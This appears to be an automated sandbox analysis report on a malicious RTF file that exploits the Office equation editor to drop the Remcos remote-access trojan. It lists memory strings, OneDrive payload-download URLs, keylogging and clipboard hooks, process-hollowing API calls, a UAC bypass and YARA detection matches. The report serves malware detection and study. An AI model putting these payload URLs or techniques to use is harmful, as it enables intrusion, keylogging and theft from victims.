                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                        Source: bhvF6ED.tmp.13.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                        Source: hjc.exe, 00000005.00000003.369181364.0000000000330000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                        Source: hjc.exe, 00000005.00000002.372380692.00000000002EA000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/-
                        Source: remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/4
                        Source: remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/7
                        Source: remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/9
                        Source: remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/e
                        Source: remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/v
                        Source: remcos.exe, 00000019.00000002.496112461.000000001477B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=FDB0512DE79
                        Source: remcos.exe, 00000019.00000002.496003835.0000000014630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=FDB0512DE793B32E%21191&authkey=
                        Source: remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4m1QphtspBBMGygafIGFYGxEUuSWjKY2dMrUpXGeJNpqtj0i_A5B0XA1Aj7IMN8zjT
                        Source: remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4m8jjd3f9BpBLsSbDI3D4w4BLmop1yruq85sZlFAr-4Rol8mEokjtpsS6ivaddcrG-
                        Source: remcos.exe, 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mTC_XyZRHB379OztWxqX44YH0ZY7OaAZhjXGrl4fCtKBoRTQqeK6A_lQZwfjwKNP7
                        Source: remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mYCQQoHB3biLh5JPth5_f-kOB87DNi8p0jtMSHrwPoPCEVl-mpqMaKw_mqKIpuxjn
                        Source: remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mio8rSS_2jC5-0VIhrGMPPnTg6gYb3Bxmu9ktmO2sVy1Vu5NgT_hEOa73bPesLFGH
                        Source: hjc.exe, 00000005.00000002.372380692.0000000000345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mpZ
                        Source: hjc.exe, 00000005.00000003.369181364.0000000000330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgpra.db.files.1drv.com/y4mpZajfWPqKjdE4uGrq5tmWJHmffdrvebeUi1KiWBx9grNpUr-Q2JlZ3LArHG3A_O0
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                        Source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: hjc.exe, 00000005.00000002.372380692.00000000002F6000.00000004.00000020.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.369181364.00000000002D4000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                        Source: remcos.exe, 00000014.00000003.427677327.0000000002095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=ph
                        Source: remcos.exe, 0000000D.00000003.426556869.0000000002145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_fl
                        Source: remcos.exe, 00000014.00000003.427230433.0000000002096000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.426945991.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427677327.00000000020AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: remcos.exe, 0000000D.00000003.426556869.0000000002145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/h
                        Source: remcos.exe, 00000014.00000003.427677327.0000000002095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.comH
                        Source: remcos.exe, 0000000D.00000003.422403574.000000000026E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427063069.0000000001C0E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.426945991.0000000001C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.adobe.
                        Source: remcos.exe, 00000009.00000002.850738765.000000002E060000.00000004.00000001.00020000.00000000.sdmp, remcos.exe, 00000009.00000003.391269695.000000002E060000.00000004.00000800.00020000.00000000.sdmp, remcos.exe, 00000014.00000003.427230433.0000000002096000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.adobe.c
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                        Source: remcos.exe, 00000010.00000002.401505696.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: bhv1FE0.tmp.20.dr, bhvF6ED.tmp.13.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Contains functionality to register a low level keyboard hook
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CAA2B8 SetWindowsHookExA 0000000D,15CAA2A4,000000005_2_15CAA2B8
                        Installs a global keyboard hook
                        Source: C:\ProgramData\Remcos\remcos.exeWindows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CAB70E OpenClipboard,GetClipboardData,CloseClipboard,5_2_15CAB70E
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CAB70E OpenClipboard,GetClipboardData,CloseClipboard,5_2_15CAB70E
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000019.00000002.493552957.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.464677307.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.468510492.00000000007A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.372380692.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.395322214.0000000000729000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000002.493552957.0000000000695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.845486984.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.431190937.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\fggrt\logs.dat, type: DROPPED

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: OKhCyJ619J.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000C.00000002.399844258.0000000014D2B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000017.00000002.469944205.000000001550B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000018.00000002.471719434.0000000014E7B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 00000011.00000002.436864812.000000001588B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000019.00000002.496351890.00000000158EB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000009.00000002.848171681.00000000157EB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 00000005.00000002.379080193.000000007DA80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: hjc.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: remcos.exe PID: 3572, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: Rdxcjsng.PIF PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: remcos.exe PID: 3984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: remcos.exe PID: 172, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: Rdxcjsng.PIF PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: remcos.exe PID: 3268, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Users\Public\Libraries\RdxcjsngO.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                        Office equation editor drops PE file
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hjc.exeJump to dropped file
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exeJump to dropped file
                        PE file contains section with special chars
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: C:\ProgramData\Remcos\remcos.exeProcess Stats: CPU usage > 49%
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                        Source: C:\Windows\SysWOW64\extrac32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFMemory allocated: 770B0000 page execute and read and write
                        Source: C:\ProgramData\Remcos\remcos.exeMemory allocated: 770B0000 page execute and read and write
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,5_2_0324C368
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,5_2_0324C3F8
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,5_2_0324C4DC
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,5_2_03247968
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,5_2_0324C3F6
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,5_2_03247AC0
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,5_2_03247966
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247F46 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,5_2_03247F46
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247F48 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,5_2_03247F48
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_0334C4DC NtOpenFile,NtReadFile,NtClose,9_2_0334C4DC
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_03347968 GetModuleHandleW,NtAllocateVirtualMemory,9_2_03347968
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_03347966 GetModuleHandleW,NtAllocateVirtualMemory,9_2_03347966
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,5_2_0324CA6C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD6FEA5_2_15CD6FEA
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD87705_2_15CD8770
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CDDE9D5_2_15CDDE9D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CC6E0E5_2_15CC6E0E
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CE61F05_2_15CE61F0
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD39465_2_15CD3946
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CF41595_2_15CF4159
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CBF0FA5_2_15CBF0FA
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CC739D5_2_15CC739D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CC7BAF5_2_15CC7BAF
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CBDB625_2_15CBDB62
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CF332B5_2_15CF332B
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CC7A465_2_15CC7A46
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_032320C45_2_032320C4
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE9B5C19_2_2DE9B5C1
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DEA71949_2_2DEA7194
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_033320C49_2_033320C4
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_0333C8D69_2_0333C8D6
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_03359D789_2_03359D78
                        Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: String function: 032344A0 appears 67 times
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: String function: 03236658 appears 32 times
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: String function: 03234698 appears 247 times
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: String function: 03234824 appears 882 times
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: String function: 03247BE8 appears 45 times
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 03334698 appears 156 times
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 03336658 appears 32 times
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 03334824 appears 628 times
                        Source: netutils.dll.5.drStatic PE information: Number of sections : 19 > 10
                        Source: OKhCyJ619J.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 5.2.hjc.exe.15ca0000.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 5.2.hjc.exe.15ca0000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000C.00000002.399844258.0000000014D2B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000017.00000002.469944205.000000001550B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
